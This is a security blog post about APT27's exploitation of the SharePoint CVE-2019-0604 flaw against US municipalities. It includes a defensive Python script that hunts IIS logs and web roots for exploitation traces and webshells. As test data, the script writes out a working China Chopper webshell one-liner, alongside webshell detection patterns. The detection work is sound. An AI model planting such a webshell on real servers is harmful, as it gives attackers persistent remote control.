Sharepoint, Nation-State Cyberattacks, and You

Last week I wrote about the threat that nation-state actors pose to enterprise organizations, and included a brief taxonomy of attackers.

This week the FBI alerted the cybersecurity community to two compromises from 2019, likely the work of APT27.

I’d like to highlight two interesting facts about the attacks.

First, both intrusions exploited the same SharePoint flaw, CVE-2019-0604, a remote code execution vulnerability (a .NET deserialization bug) that lets an attacker run code on the SharePoint server and effectively take it over.

Some good technical writeups on the bug are here and here, and this writeup talks about good ways to detect and remediate if you’ve been hit.

So takeaway number 1: If you're running SharePoint, remediate now! Make sure you have the April 2019 update: Microsoft apparently shipped three successive fixes for this bug last year, and only the third and final one (April) was fully effective.

Takeaway number 2: The reported attacks were on (unnamed) US municipalities, potentially putting the information of thousands of government workers at risk.

As the article I linked to says:

The FBI says that once attackers got a foothold on these networks, “malicious activities included exfiltration of user information, escalation of administrative privileges, and the dropping of webshells for remote/backdoor persistent access.”
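The FBI's description above (exploit, then webshells for persistence) and the detection writeup linked earlier are both about the same question: how do you tell whether your SharePoint server was hit? The script below is an added example written for this post, not code from the FBI alert or any of the linked writeups. It runs two checks a responder would do: flag POSTs to Picker.aspx (the publicly documented endpoint the CVE-2019-0604 exploit hits) in IIS W3C logs and pivot on what those clients requested next, then scan the LAYOUTS web root for ASP.NET webshell indicators such as the China Chopper `eval(Request...)` one-liner. Every log line and file it uses is a constructed sample; the indicator list and the file extensions scanned are assumptions to tune for your environment.

```python
"""Post-compromise hunt for CVE-2019-0604 traces on a SharePoint front end.

Two checks, matching the FBI's description of the activity (webshells
dropped for persistence after the initial exploit):
  1. IIS W3C logs: POST requests to Picker.aspx, the publicly documented
     endpoint the CVE-2019-0604 exploit hits, and what those clients did next.
  2. The LAYOUTS web root: .aspx/.ashx/.asmx files carrying webshell indicators.
All log lines and files below are CONSTRUCTED samples for illustration.
"""
import re
import tempfile
from pathlib import Path

# Constructed IIS W3C log excerpt: one internal user, one attacker (203.0.113.77)
# who POSTs to Picker.aspx and then calls a freshly dropped icon.aspx.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-bytes cs-bytes
2019-04-22 03:14:07 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\jdoe 10.0.1.20 Mozilla/5.0 200 5120 611
2019-04-22 03:14:09 10.0.0.5 POST /_layouts/15/Picker.aspx - 443 - 203.0.113.77 python-requests/2.21.0 200 1021 18944
2019-04-22 03:14:11 10.0.0.5 GET /_layouts/15/images/favicon.ico - 443 CORP\\jdoe 10.0.1.20 Mozilla/5.0 200 1406 512
2019-04-22 03:14:15 10.0.0.5 POST /_layouts/15/images/icon.aspx - 443 - 203.0.113.77 python-requests/2.21.0 200 302 1450
"""


def parse_iis_w3c(text):
    """Yield one dict per request, keyed by the names in the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):  # skip malformed lines rather than crash mid-triage
            yield dict(zip(fields, values))


def picker_posts(text):
    """POSTs to Picker.aspx. Legitimate people-picker dialogs also POST here,
    so treat each hit as a lead (who: username, client IP, agent), not proof."""
    hits = []
    for rec in parse_iis_w3c(text):
        if rec["cs-method"] == "POST" and rec["cs-uri-stem"].lower().endswith("/picker.aspx"):
            hits.append({"when": f'{rec["date"]} {rec["time"]}', "user": rec["cs-username"],
                         "client": rec["c-ip"], "agent": rec["cs(User-Agent)"],
                         "req_bytes": int(rec["cs-bytes"]) if rec["cs-bytes"].isdigit() else None})
    return hits


def followup_aspx_requests(text, client_ips):
    """Other .aspx URIs the flagged clients touched; a dropped webshell
    shows up here as a path that is not a stock SharePoint page."""
    seen = set()
    for rec in parse_iis_w3c(text):
        stem = rec["cs-uri-stem"]
        if (rec["c-ip"] in client_ips and stem.lower().endswith(".aspx")
                and not stem.lower().endswith("/picker.aspx")):
            seen.add(stem)
    return sorted(seen)


# Indicators, not proof (assumed list): eval over request input is the China
# Chopper one-liner; a JScript page directive is rare in stock SharePoint;
# process spawning from a page under LAYOUTS warrants a look.
WEBSHELL_INDICATORS = {
    "eval-on-request": re.compile(r"eval\s*\(\s*Request\b", re.I),
    "jscript-page": re.compile(r'Language\s*=\s*"?JScript"?', re.I),
    "process-spawn": re.compile(r"System\.Diagnostics\.Process|Process\.Start\s*\(", re.I),
}


def scan_aspx_tree(root):
    """Return [(path relative to root, [indicator names])] for files matching any indicator."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.suffix.lower() not in (".aspx", ".ashx", ".asmx"):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        matched = [name for name, rx in WEBSHELL_INDICATORS.items() if rx.search(text)]
        if matched:
            findings.append((path.relative_to(root).as_posix(), matched))
    return findings


def build_sample_tree():
    """Constructed mini LAYOUTS tree: one stock-looking page, one China Chopper shell."""
    root = Path(tempfile.mkdtemp(prefix="layouts-"))
    (root / "images").mkdir()
    (root / "start.aspx").write_text(
        '<%@ Page Language="C#" Inherits="Microsoft.SharePoint.WebControls.LayoutsPageBase" %>\n'
        '<asp:Content runat="server">Welcome</asp:Content>\n')
    (root / "images" / "icon.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>\n')
    return root


if __name__ == "__main__":
    leads = picker_posts(SAMPLE_IIS_LOG)
    for lead in leads:
        print("Picker.aspx POST:", lead)
    print("Follow-up .aspx hits:", followup_aspx_requests(SAMPLE_IIS_LOG, {l["client"] for l in leads}))
    for rel, names in scan_aspx_tree(build_sample_tree()):
        print(f"possible webshell {rel}: {', '.join(names)}")
```

On a real server, point `parse_iis_w3c` at the files under the IIS log directory for the SharePoint web application and `scan_aspx_tree` at the `TEMPLATE\LAYOUTS` folder of each installed SharePoint hive, and review any .aspx the flagged clients touched against a known-good install. Finding nothing here is not a clean bill of health: the FBI also reported credential theft and privilege escalation, so pivot into domain logs for the service account the attackers would have inherited.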

People, this is a big freaking deal. If you haven't remediated SharePoint (with the April update), please do it now! And if you're a municipality or local government, don't assume you're safe.
